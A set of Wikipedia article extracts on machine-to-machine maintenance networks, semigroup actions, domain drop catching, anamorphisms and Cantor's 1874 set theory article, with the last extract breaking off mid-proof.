The application of intelligent analysis tools and Device-to-Business (D2B) TM informatics platform form the basis of e-maintenance machine network that can lead to near-zero downtime performance of machines and systems.[34]The e-maintenance machine network provides integration between the factory floor system and e-business system, and thus enables the real time decision making in terms of near-zero downtime, reducing uncertainties and improved system performance.[35]In addition, with the help of highly interconnected machine networks and advance intelligent analysis tools, several novel maintenance types are made possible nowadays. For instance, the distant maintenance without dispatching engineers on-site, the online maintenance without shutting down the operating machines or systems, and thepredictive maintenancebefore a machine failure become catastrophic. All these benefits of e-maintenance machine network add up improve the maintenance efficiency and transparency significantly.
As described in,[36]The framework of e-maintenance machine network consists of sensors, data acquisition system, communication network, analytic agents, decision-making support knowledge base, information synchronization interface and e-business system for decision making. Initially, the sensors, controllers and operators with data acquisition are used to collect the raw data from equipment and send it out to Data Transformation Layer automatically via internet or intranet. The Data Transform Layer then employs signal processing tools and feature extraction methods to convert the raw data into useful information. This converted information often carries rich information about the reliability and availability of machines or system and is more agreeable for intelligent analysis tools to perform subsequent process. The Synchronization Module and Intelligent Tools comprise the major processing power of the e-maintenance machine network and provide optimization, prediction, clustering, classification, bench-marking and so on. The results from this module can then be synchronized and shared with the e-business system on for decision making. In real application, the synchronization module will provide connection with other departments at the decision making level, like enterprise resource planning (ERP), customer relation management (CRM) and supply chain management (SCM).
Another application of machine to machine network is in the health management for a fleet of similar machines using clustering approach. This method was introduced to address the challenge of developing fault detection models for applications with non-stationary operating regimes or with incomplete data. The overall methodology consists of two stages: 1) Fleet Clustering to group similar machines for sound comparison; 2) Local Cluster Fault Detection to evaluate the similarity of individual machines to the fleet features. The purpose of fleet clustering is to aggregate working units with similar configurations or working conditions into a group for sound comparison and subsequently create local fault detection models when global models cannot be established. Within the framework of peer to peer comparison methodology, the machine to machine network is crucial to ensure the instantaneous information share between different working units and thus form the basis of fleet level health management technology.
The fleet level health management using clustering approach was patented for its application in wind turbine health monitoring[37]after validated in a wind turbine fleet of three distributed wind farms.[38]Different with other industrial devices with fixed or static regimes, wind turbine's operating condition is greatly dictated by wind speed and other ambient factors. Even though the multi-modeling methodology can be applicable in this scenario, the number of wind turbines in a wind farm is almost infinite and may not present itself as a practical solution. Instead, by leveraging on data generated from other similar turbines in the network, this problem can be properly solved and local fault detection models can be effective built. The results of wind turbine fleet level health management reported in[37][39]demonstrated the effectiveness of applying a cluster-based fault detection methodology in the wind turbine networks.
Fault detectionfor a horde of industrial robots experiences similar difficulties as lack of fault detection models and dynamic operating condition.Industrial robotsare crucial inautomotive manufacturingand perform different tasks as welding, material handling, painting, etc. In this scenario, robotic maintenance becomes critical to ensure continuous production and avoid downtime. Historically, the fault detection models for all the industrial robots are trained similarly. Critical model parameters like training samples, components, and alarming limits are set the same for all the units regardless of their different functionalities. Even though these identical fault detection models can effectively identify faults sometimes, numerous false alarms discourage users from trusting the reliability of the system. However, within a machine network, industrial robots with similar tasks or working regimes can be group together; the abnormal units in a cluster can then be prioritized for maintenance via training based or instantaneous comparison. This peer to peer comparison methodology inside a machine network could improve the fault detection accuracy significantly.[38]
|
https://en.wikipedia.org/wiki/Machine_to_Machine
|
Inalgebraandtheoretical computer science, anactionoractof asemigroupon asetis a rule which associates to each element of the semigroup atransformationof the set in such a way that the product of two elements of the semigroup (using the semigroupoperation) is associated with thecompositeof the two corresponding transformations. The terminology conveys the idea that the elements of the semigroup areactingas transformations of the set. From analgebraicperspective, a semigroup action is a generalization of the notion of agroup actioningroup theory. From the computer science point of view, semigroup actions are closely related toautomata: the set models the state of the automaton and the action models transformations of that state in response to inputs.
An important special case is amonoid actionoract, in which the semigroup is amonoidand theidentity elementof the monoid acts as theidentity transformationof a set. From acategory theoreticpoint of view, a monoid is acategorywith one object, and an act is a functor from that category to thecategory of sets. This immediately provides a generalization to monoid acts on objects in categories other than the category of sets.
Another important special case is atransformation semigroup. This is a semigroup of transformations of a set, and hence it has a tautological action on that set. This concept is linked to the more general notion of a semigroup by an analogue ofCayley's theorem.
(A note on terminology: the terminology used in this area varies, sometimes significantly, from one author to another. See the article for details.)
LetSbe a semigroup. Then a (left)semigroup action(oract) ofSis a setXtogether with an operation• :S×X→Xwhich is compatible with the semigroupoperation∗ as follows:
This is the analogue in semigroup theory of a (left)group action, and is equivalent to asemigroup homomorphisminto the set of functions onX. Right semigroup actions are defined in a similar way using an operation• :X×S→Xsatisfying(x•a) •b=x• (a∗b).
IfMis a monoid, then a (left)monoid action(oract) ofMis a (left) semigroup action ofMwith the additional property that
whereeis the identity element ofM. This correspondingly gives a monoid homomorphism. Right monoid actions are defined in a similar way. A monoidMwith an action on a set is also called anoperator monoid.
A semigroup action ofSonXcan be made into monoid act by adjoining an identity to the semigroup and requiring that it acts as the identity transformation onX.
IfSis a semigroup or monoid, then a setXon whichSacts as above (on the left, say) is also known as a (left)S-act,S-set,S-action,S-operand, orleft act overS. Some authors do not distinguish between semigroup and monoid actions, by regarding the identity axiom (e•x=x) as empty when there is no identity element, or by using the termunitaryS-actfor anS-act with an identity.[1]
The defining property of an act is analogous to theassociativityof the semigroup operation, and means that all parentheses can be omitted. It is common practice, especially in computer science, to omit the operations as well so that both the semigroup operation and the action are indicated by juxtaposition. In this waystringsof letters fromSact onX, as in the expressionstxfors,tinSandxinX.
It is also quite common to work with right acts rather than left acts.[2]However, every right S-act can be interpreted as a left act over theopposite semigroup, which has the same elements as S, but where multiplication is defined by reversing the factors,s•t=t•s, so the two notions are essentially equivalent. Here we primarily adopt the point of view of left acts.
It is often convenient (for instance if there is more than one act under consideration) to use a letter, such asT{\displaystyle T}, to denote the function
defining theS{\displaystyle S}-action and hence writeT(s,x){\displaystyle T(s,x)}in place ofs⋅x{\displaystyle s\cdot x}. Then for anys{\displaystyle s}inS{\displaystyle S}, we denote by
the transformation ofX{\displaystyle X}defined by
By the defining property of anS{\displaystyle S}-act,T{\displaystyle T}satisfies
Further, consider a functions↦Ts{\displaystyle s\mapsto T_{s}}. It is the same ascurry(T):S→(X→X){\displaystyle \operatorname {curry} (T):S\to (X\to X)}(seeCurrying). Becausecurry{\displaystyle \operatorname {curry} }is a bijection, semigroup actions can be defined as functionsS→(X→X){\displaystyle S\to (X\to X)}which satisfy
That is,T{\displaystyle T}is a semigroup action ofS{\displaystyle S}onX{\displaystyle X}if and only ifcurry(T){\displaystyle \operatorname {curry} (T)}is asemigroup homomorphismfromS{\displaystyle S}to the full transformation monoid ofX{\displaystyle X}.
LetXandX′ beS-acts. Then anS-homomorphism fromXtoX′ is a map
such that
The set of all suchS-homomorphisms is commonly written asHomS(X,X′){\displaystyle \mathrm {Hom} _{S}(X,X')}.
M-homomorphisms ofM-acts, forMa monoid, are defined in exactly the same way.
For a fixed semigroupS, the leftS-acts are the objects of a category, denotedS-Act, whose morphisms are theS-homomorphisms. The corresponding category of rightS-acts is sometimes denoted by Act-S. (This is analogous to thecategoriesR-Mod and Mod-Rof left and rightmodulesover aring.)
For a monoidM, the categoriesM-Act and Act-Mare defined in the same way.
A correspondence between transformation semigroups and semigroup actions is described below. If we restrict it tofaithfulsemigroup actions, it has nice properties.
Any transformation semigroup can be turned into a semigroup action by the following construction. For any transformation semigroupS{\displaystyle S}ofX{\displaystyle X}, define a semigroup actionT{\displaystyle T}ofS{\displaystyle S}onX{\displaystyle X}asT(s,x)=s(x){\displaystyle T(s,x)=s(x)}fors∈S,x∈X{\displaystyle s\in S,x\in X}. This action is faithful, which is equivalent tocurry(T){\displaystyle curry(T)}beinginjective.
Conversely, for any semigroup actionT{\displaystyle T}ofS{\displaystyle S}onX{\displaystyle X}, define a transformation semigroupS′={Ts∣s∈S}{\displaystyle S'=\{T_{s}\mid s\in S\}}. In this construction we "forget" the setS{\displaystyle S}.S′{\displaystyle S'}is equal to theimageofcurry(T){\displaystyle curry(T)}. Let us denotecurry(T){\displaystyle curry(T)}asf{\displaystyle f}for brevity. Iff{\displaystyle f}isinjective, then it is a semigroupisomorphismfromS{\displaystyle S}toS′{\displaystyle S'}. In other words, ifT{\displaystyle T}is faithful, then we forget nothing important. This claim is made precise by the following observation: if we turnS′{\displaystyle S'}back into a semigroup actionT′{\displaystyle T'}ofS′{\displaystyle S'}onX{\displaystyle X}, thenT′(f(s),x)=T(s,x){\displaystyle T'(f(s),x)=T(s,x)}for alls∈S,x∈X{\displaystyle s\in S,x\in X}.T{\displaystyle T}andT′{\displaystyle T'}are "isomorphic" viaf{\displaystyle f}, i.e., we essentially recoveredT{\displaystyle T}. Thus, some authors[3]see no distinction between faithful semigroup actions and transformation semigroups.
Transformation semigroups are of essential importance for the structure theory offinite-state machinesinautomata theory. In particular, asemiautomatonis a triple (Σ,X,T), where Σ is a non-empty set called theinput alphabet,Xis a non-empty set called theset of statesandTis a function
called thetransition function. Semiautomata arise fromdeterministic automataby ignoring the initial state and the set of accept states.
Given a semiautomaton, letTa:X→X, fora∈ Σ, denote the transformation ofXdefined byTa(x) =T(a,x). Then the semigroup of transformations ofXgenerated by {Ta:a∈ Σ} is called thecharacteristic semigrouportransition systemof (Σ,X,T). This semigroup is a monoid, so this monoid is called thecharacteristicortransition monoid. It is also sometimes viewed as a Σ∗-act onX, where Σ∗is thefree monoidof strings generated by the alphabet Σ,[note 1]and the action of strings extends the action of Σ via the property
Krohn–Rhodes theory, sometimes also calledalgebraic automata theory, gives powerful decomposition results for finite transformation semigroups by cascading simpler components.
|
https://en.wikipedia.org/wiki/Semigroup_action
|
Domain drop catching, also known asdomain sniping, is the practice of registering adomain nameonce registration has lapsed, immediately after expiry.
When a domain is first registered, the customer is usually given the option of registering the domain for one year or longer, with automatic renewal as a possible option.[1]Although somedomain registrarsoften make multiple attempts to notify a registrant of a domain name's impending expiration, a failure on the part of the original registrant to provide the registrar with accurate contact information makes an unintended registration lapse possible. Practices also vary, and registrars are not required to notify customers of impending expiration.[1]Unless the original registrant holds atrademarkor other legal entitlement to the name, they are often left without any form of recourse in getting their domain name back. It is incumbent on registrants to be proactive in managing their name registrations and to be good stewards of their domain names. By law there are no perpetual rights to domain names after payment of registration fees lapses, aside from trademark rights granted bycommon laworstatute.
The Redemption Grace Period is an addition toICANN's Registrar Accreditation Agreement (RAA)[2]which allows a registrant to reclaim their domain name for a number of days after it has expired.[3]This length of time varies byTLD, and is usually around 30 to 90 days.[3]Prior to the implementation of the RGP by ICANN, individuals could easily engage in domain sniping to extort money from the original registrant to buy their domain name back.
After the period between the domain's expiry date and the beginning of the RGP, the domain's status changes to "redemption period" during which an owner may be required to pay a fee (typically around US$100)[4]to re-activate and re-register the domain.[5]ICANN's RAA requires registrars to delete domain registrations once a second notice has been given and the RGP has elapsed. At the end of the "pending delete" phase of 5 days, the domain will be dropped from the ICANN database.[5]
For particularly popular domain names, there are often multiple parties anticipating the expiration. Competition for expiring domain names has since become a purview of drop catching services. These services offer to dedicate their servers to securing a domain name upon its availability, usually at an auction price.[5]Individuals with their limited resources find it difficult to compete with these drop catching firms for highly desirable domain names.[5]
Retail registrars such asGoDaddyoreNomretain names for auction through services such as TDNAM or Snapnames through a practice known asdomain warehousing.[6]Drop catch services are performed by bothICANN-accredited registrarsand non-accredited registrars.
Some registry operators (for example dot-РФ, dot-PL, dot-RU, dot-ST, dot-TM, dot-NO) offer a service by which a back-order (also sometimes known as a "domain future" or "domain option") can be placed on a domain name.
If a domain name is due to return to the open market, then the owner of the back-order will be given the first opportunity to acquire the domain name before the name is deleted and is open to a free-for-all. In this way back-orders will usually take precedence over drop-catch.
There may be a fee for the back-order itself, often only one back-order can be placed per domain name and a further purchase or renewal fee may be applicable if the back-order succeeds.
Back-Orders typically expire in the same way domain names do, so are purchased for a specific number of years.
Different operators have different rules. In some cases back-orders can only be placed at certain times, for example after the domain name has expired, but before it has returned to the open market (seeRedemption Grace Period).
In theCommodity marketsense, a back-order is often more like an "option" than a "future" as there is often no obligation for the new registrant to take the name, even after it has been handed to the owner of the back-order. For example, some registries give the new registrant 30 days to purchase a renewal on the name before it is once again returned to the open market (or any new back-order registrant).
|
https://en.wikipedia.org/wiki/Drop_catching
|
In computer programming, ananamorphismis a function that generates a sequence by repeated application of the function to its previous result. You begin with some value A and apply a function f to it to get B. Then you apply f to B to get C, and so on until some terminating condition is reached. The anamorphism is the function that generates the list of A, B, C, etc. You can think of the anamorphism as unfolding the initial value into a sequence.
The above layman's description can be stated more formally incategory theory: the anamorphism of acoinductive typedenotes the assignment of acoalgebrato its uniquemorphismto thefinal coalgebraof anendofunctor. These objects are used infunctional programmingasunfolds.
Thecategorical dual(aka opposite) of the anamorphism is thecatamorphism.
Infunctional programming, ananamorphismis a generalization of the concept ofunfoldson coinductivelists. Formally, anamorphisms aregeneric functionsthat cancorecursivelyconstruct a result of a certaintypeand which is parameterized by functions that determine the next single step of the construction.
The data type in question is defined as the greatest fixed pointν X . F Xof a functorF. By the universal property of final coalgebras, there is a unique coalgebra morphismA → ν X . F Xfor any otherF-coalgebraa : A → F A. Thus, one can define functions from a typeA_into_ a coinductive datatype by specifying a coalgebra structureaonA.
As an example, the type of potentially infinitelists(with elements of a fixed typevalue) is given as the fixed point[value] = ν X . value × X + 1, i.e. a list consists either of avalueand a further list, or it is empty. A (pseudo-)Haskell-Definition might look like this:
It is the fixed point of the functorF value, where:
One can easily check that indeed the type[value]is isomorphic toF value [value], and thus[value]is the fixed point.
(Also note that in Haskell, least and greatest fixed points of functors coincide, therefore inductive lists are the same as coinductive, potentially infinite lists.)
Theanamorphismfor lists (then usually known asunfold) would build a (potentially infinite) list from a state value. Typically, the unfold takes a state valuexand a functionfthat yields either a pair of a value and a new state, or a singleton to mark the end of the list. The anamorphism would then begin with a first seed, compute whether the list continues or ends, and in case of a nonempty list, prepend the computed value to the recursive call to the anamorphism.
A Haskell definition of an unfold, or anamorphism for lists, calledana, is as follows:
We can now implement quite general functions usingana, for example a countdown:
This function will decrement an integer and output it at the same time, until it is negative, at which point it will mark the end of the list. Correspondingly,ana f 3will compute the list[2,1,0].
An anamorphism can be defined for any recursive type, according to a generic pattern, generalizing the second version ofanafor lists.
For example, the unfold for the tree data structure
is as follows
To better see the relationship between the recursive type and its anamorphism, note thatTreeandListcan be defined thus:
The analogy withanaappears by renamingbin its type:
With these definitions, the argument to the constructor of the type has the same type as the return type of the first argument ofana, with the recursive mentions of the type replaced withb.
One of the first publications to introduce the notion of an anamorphism in the context of programming was the paperFunctional Programming with Bananas, Lenses, Envelopes and Barbed Wire,[1]byErik Meijeret al., which was in the context of theSquiggolprogramming language.
Functions likezipanditerateare examples of anamorphisms.ziptakes a pair of lists, say ['a','b','c'] and [1,2,3] and returns a list of pairs [('a',1),('b',2),('c',3)].Iteratetakes a thing, x, and a function, f, from such things to such things, and returns the infinite list that comes from repeated application of f, i.e. the list [x, (f x), (f (f x)), (f (f (f x))), ...].
To prove this, we can implement both using our generic unfold,ana, using a simple recursive routine:
In a language like Haskell, even the abstract functionsfold,unfoldandanaare merely defined terms, as we have seen from the definitions given above.
Incategory theory, anamorphisms are thecategorical dualofcatamorphisms(and catamorphisms are the categorical dual of anamorphisms).
That means the following.
Suppose (A,fin) is afinalF-coalgebrafor someendofunctorFof somecategoryinto itself.
Thus,finis amorphismfromAtoFA, and since it is assumed to be final we know that whenever (X,f) is anotherF-coalgebra (a morphismffromXtoFX), there will be a uniquehomomorphismhfrom (X,f) to (A,fin), that is a morphismhfromXtoAsuch thatfin.h = Fh.f.
Then for each suchfwe denote byanafthat uniquely specified morphismh.
In other words, we have the following defining relationship, given some fixedF,A, andfinas above:
A notation for anaffound in the literature is[(f)]{\displaystyle [\!(f)\!]}. The brackets used are known aslens brackets, after which anamorphisms are sometimes referred to aslenses.
|
https://en.wikipedia.org/wiki/Anamorphism
|
Cantor's first set theory articlecontainsGeorg Cantor's first theorems of transfiniteset theory, which studiesinfinite setsand their properties. One of these theorems is his "revolutionary discovery" that thesetof allreal numbersisuncountably, rather thancountably, infinite.[1]This theorem is proved usingCantor's first uncountability proof, which differs from the more familiar proof using hisdiagonal argument. The title of the article, "On a Property of the Collection of All Real Algebraic Numbers" ("Ueber eine Eigenschaft des Inbegriffes aller reellen algebraischen Zahlen"), refers to its first theorem: the set of realalgebraic numbersis countable. Cantor's article was published in 1874. In 1879, he modified his uncountability proof by using thetopologicalnotion of a set beingdensein an interval.
Cantor's article also contains a proof of the existence oftranscendental numbers. Bothconstructive and non-constructive proofshave been presented as "Cantor's proof." The popularity of presenting a non-constructive proof has led to a misconception that Cantor's arguments are non-constructive. Since the proof that Cantor published either constructs transcendental numbers or does not, an analysis of his article can determine whether or not this proof is constructive.[2]Cantor's correspondence withRichard Dedekindshows the development of his ideas and reveals that he had a choice between two proofs: a non-constructive proof that uses the uncountability of the real numbers and a constructive proof that does not use uncountability.
Historians of mathematics have examined Cantor's article and the circumstances in which it was written. For example, they have discovered that Cantor was advised to leave out his uncountability theorem in the article he submitted — he added it duringproofreading. They have traced this and other facts about the article to the influence ofKarl WeierstrassandLeopold Kronecker. Historians have also studied Dedekind's contributions to the article, including his contributions to the theorem on the countability of the real algebraic numbers. In addition, they have recognized the role played by the uncountability theorem and the concept of countability in the development of set theory,measure theory, and theLebesgue integral.
Cantor's article is short, less than four and a half pages.[A]It begins with a discussion of the realalgebraic numbersand a statement of his first theorem: The set of real algebraic numbers can be put intoone-to-one correspondencewith the set of positive integers.[3]Cantor restates this theorem in terms more familiar to mathematicians of his time: "The set of real algebraic numbers can be written as an infinitesequencein which each number appears only once."[4]
Cantor's second theorem works with aclosed interval[a,b], which is the set of real numbers ≥aand ≤b. The theorem states: Given any sequence of real numbersx1,x2,x3, ... and any interval [a,b], there is a number in [a,b] that is not contained in the given sequence. Hence, there are infinitely many such numbers.[5]
Cantor observes that combining his two theorems yields a new proof ofLiouville's theoremthat every interval [a,b] contains infinitely manytranscendental numbers.[5]
Cantor then remarks that his second theorem is:
the reason why collections of real numbers forming a so-called continuum (such as, all real numbers which are ≥ 0 and ≤ 1) cannot correspond one-to-one with the collection (ν) [the collection of all positive integers]; thus I have found the clear difference between a so-called continuum and a collection like the totality of real algebraic numbers.[6]
This remark contains Cantor's uncountability theorem, which only states that an interval [a,b] cannot be put into one-to-one correspondence with the set of positive integers. It does not state that this interval is an infinite set of largercardinalitythan the set of positive integers. Cardinality is defined in Cantor's next article, which was published in 1878.[7]
Cantor only states his uncountability theorem. He does not use it in any proofs.[3]
To prove that the set of real algebraic numbers is countable, define theheightof apolynomialofdegreenwith integercoefficientsas:n− 1 + |a0| + |a1| + ... + |an|, wherea0,a1, ...,anare the coefficients of the polynomial. Order the polynomials by their height, and order the realrootsof polynomials of the same height by numeric order. Since there are only a finite number of roots of polynomials of a given height, these orderings put the real algebraic numbers into a sequence. Cantor went a step further and produced a sequence in which each real algebraic number appears just once. He did this by only using polynomials that areirreducibleover the integers. The following table contains the beginning of Cantor's enumeration.[9]
Only the first part of Cantor's second theorem needs to be proved. It states: Given any sequence of real numbersx1,x2,x3, ... and any interval [a,b], there is a number in [a,b] that is not contained in the given sequence.[B]
To find a number in [a,b] that is not contained in the given sequence, construct two sequences of real numbers as follows: Find the first two numbers of the given sequence that are in theopen interval(a,b). Denote the smaller of these two numbers bya1and the larger byb1. Similarly, find the first two numbers of the given sequence that are in (a1,b1). Denote the smaller bya2and the larger byb2. Continuing this procedure generates a sequence of intervals (a1,b1), (a2,b2), (a3,b3), ... such that each interval in the sequence contains all succeeding intervals—that is, it generates a sequence ofnested intervals. This implies that the sequencea1,a2,a3, ... is increasing and the sequenceb1,b2,b3, ... is decreasing.[10]
Either the number of intervals generated is finite or infinite. If finite, let (aL,bL) be the last interval. If infinite, take thelimitsa∞= limn→ ∞anandb∞= limn→ ∞bn. Sincean<bnfor alln, eithera∞=b∞ora∞<b∞. Thus, there are three cases to consider:
The proof is complete since, in all cases, at least one real number in [a,b] has been found that is not contained in the given sequence.[D]
Cantor's proofs are constructive and have been used to write acomputer programthat generates the digits of a transcendental number. This program applies Cantor's construction to a sequence containing all the real algebraic numbers between 0 and 1. The article that discusses this program gives some of its output, which shows how the construction generates a transcendental.[12]
An example illustrates how Cantor's construction works. Consider the sequence:1/2,1/3,2/3,1/4,3/4,1/5,2/5,3/5,4/5, ... This sequence is obtained by ordering therational numbersin (0, 1) by increasing denominators, ordering those with the same denominator by increasing numerators, and omittingreducible fractions. The table below shows the first five steps of the construction. The table's first column contains the intervals (an,bn). The second column lists the terms visited during the search for the first two terms in (an,bn). These two terms are in red.[13]
Since the sequence contains all the rational numbers in (0, 1), the construction generates anirrational number, which turns out to be√2− 1.[14]
Cantor's construction produces mediants because the rational numbers were sequenced by increasing denominator. The first interval in the table is(13,12).{\displaystyle ({\frac {1}{3}},{\frac {1}{2}}).}Since13{\displaystyle {\frac {1}{3}}}and12{\displaystyle {\frac {1}{2}}}are adjacent inF3,{\displaystyle F_{3},}their mediant25{\displaystyle {\frac {2}{5}}}is the first fraction in the sequence between13{\displaystyle {\frac {1}{3}}}and12.{\displaystyle {\frac {1}{2}}.}Hence,13<25<12.{\displaystyle {\frac {1}{3}}<{\frac {2}{5}}<{\frac {1}{2}}.}In this inequality,12{\displaystyle {\frac {1}{2}}}has the smallest denominator, so the second fraction is the mediant of25{\displaystyle {\frac {2}{5}}}and12,{\displaystyle {\frac {1}{2}},}which equals37.{\displaystyle {\frac {3}{7}}.}This implies:13<25<37<12.{\displaystyle {\frac {1}{3}}<{\frac {2}{5}}<{\frac {3}{7}}<{\frac {1}{2}}.}Therefore, the next interval is(25,37).{\displaystyle ({\frac {2}{5}},{\frac {3}{7}}).}
We will prove that the endpoints of the intervals converge to the continued fraction[0;2,2,…].{\displaystyle [0;2,2,\dots ].}This continued fraction is the limit of itsconvergents:
Thepn{\displaystyle p_{n}}andqn{\displaystyle q_{n}}sequences satisfy the equations:[16]
First, we prove by induction that for oddn, then-th interval in the table is:
and for evenn, the interval's endpoints are reversed:(pnqn,pn+pn−1qn+qn−1).{\displaystyle \left({\frac {p_{n}}{q_{n}}},{\frac {p_{n}+p_{n-1}}{q_{n}+q_{n-1}}}\right)\!.}
This is true for the first interval since:
Assume that the inductive hypothesis is true for thek-th interval. Ifkis odd, this interval is:
The mediant of its endpoints2pk+pk−12qk+qk−1=pk+1qk+1{\displaystyle {\frac {2p_{k}+p_{k-1}}{2q_{k}+q_{k-1}}}={\frac {p_{k+1}}{q_{k+1}}}}is the first fraction in the sequence between these endpoints.
Hence,pk+pk−1qk+qk−1<pk+1qk+1<pkqk.{\displaystyle {\frac {p_{k}+p_{k-1}}{q_{k}+q_{k-1}}}<{\frac {p_{k+1}}{q_{k+1}}}<{\frac {p_{k}}{q_{k}}}.}
In this inequality,pkqk{\displaystyle {\frac {p_{k}}{q_{k}}}}has the smallest denominator, so the second fraction is the mediant ofpk+1qk+1{\displaystyle {\frac {p_{k+1}}{q_{k+1}}}}andpkqk,{\displaystyle {\frac {p_{k}}{q_{k}}},}which equalspk+1+pkpk+1+qk.{\displaystyle {\frac {p_{k+1}+p_{k}}{p_{k+1}+q_{k}}}.}
This implies:pk+pk−1qk+qk−1<pk+1qk+1<pk+1+pkpk+1+qk<pkqk.{\displaystyle {\frac {p_{k}+p_{k-1}}{q_{k}+q_{k-1}}}<{\frac {p_{k+1}}{q_{k+1}}}<{\frac {p_{k+1}+p_{k}}{p_{k+1}+q_{k}}}<{\frac {p_{k}}{q_{k}}}.}
Therefore, the (k+ 1)-st interval is(pk+1qk+1,pk+1+pkpk+1+qk).{\displaystyle \left({\frac {p_{k+1}}{q_{k+1}}},{\frac {p_{k+1}+p_{k}}{p_{k+1}+q_{k}}}\right)\!.}
This is the desired interval;pk+1qk+1{\displaystyle {\frac {p_{k+1}}{q_{k+1}}}}is the left endpoint becausek+ 1 is even. Thus, the inductive hypothesis is true for the (k+ 1)-st interval. For evenk, the proof is similar. This completes the inductive proof.
Since the right endpoints of the intervals are decreasing and every other endpoint isp2n−1q2n−1,{\displaystyle {\frac {p_{2n-1}}{q_{2n-1}}},}their limit equalslimn→∞pnqn.{\displaystyle \lim _{n\to \infty }{\frac {p_{n}}{q_{n}}}.}The left endpoints have the same limit because they are increasing and every other endpoint isp2nq2n.{\displaystyle {\frac {p_{2n}}{q_{2n}}}.}As mentioned above, this limit is the continued fraction[0;2,2,…],{\displaystyle [0;2,2,\dots ],}which equals2−1.{\displaystyle {\sqrt {2}}-1.}[17]
In 1879, Cantor published a new uncountability proof that modifies his 1874 proof. He first defines thetopologicalnotion of a point setPbeing "everywheredensein an interval":[E]
In this discussion of Cantor's proof:a,b,c,dare used instead of α, β, γ, δ. Also, Cantor only uses his interval notation if the first endpoint is less than the second. For this discussion, this means that (a,b) impliesa<b.
Since the discussion of Cantor's 1874 proof was simplified by using open intervals rather than closed intervals, the same simplification is used here. This requires an equivalent definition of everywhere dense: A setPis everywhere dense in the interval [a,b] if and only if every opensubinterval(c,d) of [a,b] contains at least one point ofP.[18]
Cantor did not specify how many points ofPan open subinterval (c,d) must contain. He did not need to specify this because the assumption that every open subinterval contains at least one point ofPimplies that every open subinterval contains infinitely many points ofP.[G]
Cantor modified his 1874 proof with a new proof of itssecond theorem: Given any sequencePof real numbersx1,x2,x3, ... and any interval [a,b], there is a number in [a,b] that is not contained inP. Cantor's new proof has only two cases. First, it handles the case ofPnot being dense in the interval, then it deals with the more difficult case ofPbeing dense in the interval. This division into cases not only indicates which sequences are more difficult to handle, but it also reveals the important role denseness plays in the proof.[proof 1]
In the first case,Pis not dense in [a,b]. By definition,Pis dense in [a,b] if and only if for all subintervals (c,d) of [a,b], there is anx∈Psuch thatx∈ (c,d). Taking the negation of each side of the "if and only if" produces:Pis not dense in [a,b] if and only if there exists a subinterval (c,d) of [a,b] such that for allx∈P:x∉ (c,d). Therefore, every number in (c,d) is not contained in the sequenceP.[proof 1]This case handlescase 1andcase 3of Cantor's 1874 proof.
In the second case, which handlescase 2of Cantor's 1874 proof,Pis dense in [a,b]. The denseness of sequencePis used torecursively definea sequence of nested intervals that excludes all the numbers inPand whoseintersectioncontains a single real number in [a,b]. The sequence of intervals starts with (a,b). Given an interval in the sequence, the next interval is obtained by finding the two numbers with the least indices that belong toPand to the current interval. These two numbers are theendpointsof the next open interval. Since an open interval excludes its endpoints, every nested interval eliminates two numbers from the front of sequenceP, which implies that the intersection of the nested intervals excludes all the numbers inP.[proof 1]Details of this proof and a proof that this intersection contains a single real number in [a,b] are given below.
Therecursive stepstarts with the interval(an–1,bn–1), the inequalitiesk1<k2< . . . <k2n–2<k2n–1anda<a1< . . . <an–1<bn–1. . . <b1<b, and the fact that the interval(an–1,bn–1)excludes the first 2n–2 members of the sequenceP—thatis,xm∉ (an–1,bn–1)form≤k2n–2. SincePis dense in [a,b], there are infinitely many numbers ofPin(an–1,bn–1). Letxk2n–1be the number with the least index andxk2nbe the number with the next larger index, and letanbe the smaller andbnbe the larger of these two numbers. Then,k2n–1<k2n,an–1<an<bn<bn–1, and (an,bn) is aproper subintervalof(an–1,bn–1). Combining these inequalities with the ones for stepn–1 of the recursion producesk1<k2< . . . <k2n–1<k2nanda<a1< . . . <an<bn. . . <b1<b. Also,xm∉ (an,bn)form=k2n–1andm=k2nsince thesexmare the endpoints of (an,bn). This together with(an–1,bn–1)excluding the first 2n–2 members of sequencePimplies that the interval (an,bn) excludes the first 2nmembers ofP—thatis,xm∉ (an,bn)form≤k2n. Therefore, for alln,xn∉ (an,bn)sincen≤k2n.[proof 1]
The sequenceanis increasing andbounded abovebyb, so the limitA= limn→ ∞anexists. Similarly, the limitB= limn→ ∞bnexists since the sequencebnis decreasing andbounded belowbya. Also,an<bnimpliesA≤B. IfA<B, then for everyn:xn∉ (A,B) becausexnis not in the larger interval (an,bn). This contradictsPbeing dense in [a,b]. Hence,A=B. For alln,A∈ (an,bn)butxn∉ (an,bn). Therefore,Ais a number in [a,b] that is not contained inP.[proof 1]
The development leading to Cantor's 1874 article appears in the correspondence between Cantor andRichard Dedekind. On November 29, 1873, Cantor asked Dedekind whether the collection of positive integers and the collection of positive real numbers "can be corresponded so that each individual of one collection corresponds to one and only one individual of the other?" Cantor added that collections having such a correspondence include the collection of positive rational numbers, and collections of the form (an1,n2, . . . ,nν) wheren1,n2, . . . ,nν, andνare positive integers.[19]
Dedekind replied that he was unable to answer Cantor's question, and said that it "did not deserve too much effort because it has no particular practical interest". Dedekind also sent Cantor a proof that the set of algebraic numbers is countable.[20]
On December 2, Cantor responded that his question does have interest: "It would be nice if it could be answered; for example, provided that it could be answeredno, one would have a new proof ofLiouville's theoremthat there are transcendental numbers."[21]
On December 7, Cantor sent Dedekind aproof by contradictionthat the set of real numbers is uncountable. Cantor starts by assuming that the real numbers in[0,1]{\displaystyle [0,1]}can be written as a sequence. Then, he applies a construction to this sequence to produce a number in[0,1]{\displaystyle [0,1]}that is not in the sequence, thus contradicting his assumption.[22]Together, the letters of December 2 and 7 provide a non-constructive proof of the existence of transcendental numbers.[23]Also, the proof in Cantor's December 7 letter shows some of the reasoning that led to his discovery that the real numbers form an uncountable set.[24]
The proof is by contradiction and starts by assuming that the real numbers in[0,1]{\displaystyle [0,1]}can be written as a sequence:
An increasing sequence is extracted from this sequence by lettingω11={\displaystyle \omega _{1}^{1}=}the first term,ω12={\displaystyle ,\ \omega _{1}^{2}=}the next largest term followingω11,ω13={\displaystyle \omega _{1}^{1},\ \omega _{1}^{3}=}the next largest term followingω12,{\displaystyle \omega _{1}^{2},}and so forth. The same procedure is applied to the remaining members of the original sequence to extract another increasing sequence. By continuing this process of extracting sequences, one sees that the sequence(I){\displaystyle (\mathrm {I} )}can be decomposed into the infinitely many sequences:[22]
